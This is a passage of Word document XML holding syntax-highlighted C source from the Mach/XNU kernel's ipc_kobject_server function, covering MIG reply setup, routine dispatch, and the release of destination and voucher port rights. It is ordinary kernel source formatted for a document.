          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"ipc_kobject_server: dropping request\n"</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kmsg_destroy</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turn</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IKM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Initialize reply message.</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define</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InP</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ach_msg_heade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define</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OutP</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ig_reply_erro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 </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         * MIG should really assure no data leakage -</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         * but until it does, pessimistically zero the</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         * whole reply buffer.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>         */</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bzero</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</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OutP</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ND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NDR_recor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siz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sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mig_reply_error_t</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bits</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MACH_MSGH_BITS_SET</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSGH_BITS_LOCAL</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InP</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_bits</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color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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remote_por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nP</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_local_port</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local_por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CH_PORT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voucher_por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CH_PORT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OutP</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Head</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_id</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nP</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_id</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color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>100</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undef</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InP</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undef</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OutP</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Find the routine to call, and call it</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     * to perform the kernel function</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ptr</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ptr</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>routine</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kernel_task</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>messages_receive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ipc_kobject_notify</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_IPC_TEST</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>            </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"ipc_kobject_server: bogus kernel message, id=%d\n"</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id</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color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* MACH_IPC_TEST */</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>            </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_MIG_MSGID_INVALID</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id</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mig_reply_erro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RetCode</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BAD_I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br/>
        <w:t>          </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kernel_task</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>messages_receive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kernel_task</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>messages_sent</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lastRenderedPageBreak/>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Destroy destination. The following code differs from</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  ipc_object_destroy in that we release the send-once</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  right instead of generating a send-once notification</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  (which would bring us here again, creating a loop).</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  It also differs in that we only expect send or</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  send-once rights, never receive rights.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  We set msgh_remote_port to IP_NULL so that the kmsg</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  destroy routines don't try to destroy the port twice.</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>destp</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ipc_port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amp;</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remote_port</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switch</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ACH_MSGH_BITS_REMOTE</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bits</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case</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSG_TYPE_PORT_SEND</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port_release_send</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(*</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>destp</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break</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case</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSG_TYPE_PORT_SEND_ONCE</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port_release_sonce</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(*</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>destp</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break</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default</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panic</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"ipc_kobject_server: strange destination rights"</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>destp</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P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Destroy voucher.  The kernel MIG servers never take ownership</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  of vouchers sent in messages.  Swallow any such rights here.</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IP_VALID</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voucher</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assert</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSG_TYPE_PORT_SEND</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MACH_MSGH_BITS_VOUCHER</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bits</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port_release_send</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voucher</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vouche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IP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bits</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSGH_BITS_COMPLEX</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amp;&amp;</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mig_reply_erro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RetCod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KERN_SUCCESS</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lastRenderedPageBreak/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>k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ig_reply_erro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RetCode</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br/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>k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KERN_SUCCESS</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k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KERN_SUCCESS</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k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NO_REPLY</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The server function is responsible for the contents</w:t>
      </w:r>
      <w:r w:rsidRPr="000C06B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
